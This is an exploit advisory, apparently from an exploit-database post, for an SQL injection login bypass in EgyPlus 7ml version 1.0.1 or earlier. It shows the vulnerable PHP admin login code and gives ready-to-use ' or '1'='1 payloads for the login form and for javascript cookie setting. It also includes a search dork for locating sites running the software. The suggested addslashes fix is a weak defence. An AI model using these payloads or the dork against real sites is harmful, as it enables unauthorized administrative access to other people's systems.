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=By: Qabandi
=Email: iqa[a]hotmail.fr
From Kuwait, PEACE...
=Vuln: EgyPlus 7ml <= 1.0.1 - Cookie Auth Bypass SQL injection vulnerability (CABSIV)
=INFO: http://egyplus.org/article-2.htm
=Download: http://traidnt.net/vb/attachment.php?attachmentid=252224&d=1211197439
=DORK: "Powered By EgyPlus"
; Magic quotes for incoming GET/POST/Cookie data.
magic_quotes_gpc = Off
$username = $_COOKIE['username']; <---- Not filtered
$password = $_COOKIE['password']; <---- Not filtered
$username = $_POST['username']; <---- Not filtered
$password = $_POST['password']; <---- Not filtered
$sql=$hazemali->query("select name,pass from admin where
name = '$username' and
pass = '$password' ");
if($AdminInfo==1) <---- Checks if MySQL statement is true then continues, FAIL...
We have TWO ways to do this:
Login with these:
username: qabandi' or '1'='1
password: qabandi' or '1'='1
or we set cookies (longer version)
javascript:document.cookie = "username=qabandi' or '1'='1"
javascript:document.cookie = "password=qabandi' or '1'='1"
./cpanel/login.php::-- <== Change the code as following;
$username = addslashes($_COOKIE['username']); <---- Filter with ADDSLASHES()
$password = addslashes($_COOKIE['password']); <---- Filter with ADDSLASHES()
$username = addslashes($_POST['username']); <---- Filter with ADDSLASHES()
$password = addslashes($_POST['password']); <---- Filter with ADDSLASHES()
$sql=$hazemali->query("select name,pass from admin where
name = '$username' and
pass = '$password' ");
Salam to All Muslim Hackers.